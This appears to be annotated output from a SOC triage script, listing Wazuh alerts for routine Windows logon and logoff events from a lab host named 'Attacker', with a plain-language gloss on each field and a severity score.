rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533928.476639
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:31:17.3513964Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43764
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  5404
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 2 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: No Impersonation Level: Impersonation New Logon: Security ID: S-1-5-21-1227732096-2714569048-1995468811-1002 Account Name: Attcker1 Account Domain: Attacker Logon ID: 0x25F285D Linked Logon ID: 0x25F1ED7 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x624 Process Name: C:\Windows\System32\svchost.exe Network Information: Workstation Name: ATTACKER Source Network Address: 127.0.0.1 Source Port: 0 Detailed Authentication Information: Logon Process: User32 Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-21-1227732096-2714569048-1995468811-1002
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x25f285d
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  User32
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.workstationName:  ATTACKER
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x624
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\svchost.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.ipAddress:  127.0.0.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.ipPort:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x25f1ed7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Windows User Logoff.

🧠 What happened? Windows User Logoff.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:32:08.124+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:08.124+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows User Logoff.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60137
Numeric ID of the detection rule that fired.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533928.484358
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4634
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12545
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:31:17.3563661Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43766
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  10720
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was logged off. Subject: Security ID: S-1-5-21-1227732096-2714569048-1995468811-1002 Account Name: Attcker1 Account Domain: Attacker Logon ID: 0x25F285D Logon Type: 2 This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-21-1227732096-2714569048-1995468811-1002
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x25f285d
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Windows User Logoff.

🧠 What happened? Windows User Logoff.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:32:08.150+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:08.150+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows User Logoff.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60137
Numeric ID of the detection rule that fired.

rule.firedtimes:  4
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533928.486825
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4634
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12545
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:31:17.3658372Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43767
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  13300
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was logged off. Subject: Security ID: S-1-5-21-1227732096-2714569048-1995468811-1002 Account Name: Attcker1 Account Domain: Attacker Logon ID: 0x25F1ED7 Logon Type: 2 This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-21-1227732096-2714569048-1995468811-1002
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x25f1ed7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:32:08.365+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:08.365+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  48
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533928.489292
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:31:20.5246392Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43772
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  5404
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:32:08.462+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:08.462+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  49
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533928.496628
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:31:24.4863616Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43774
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  5404
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

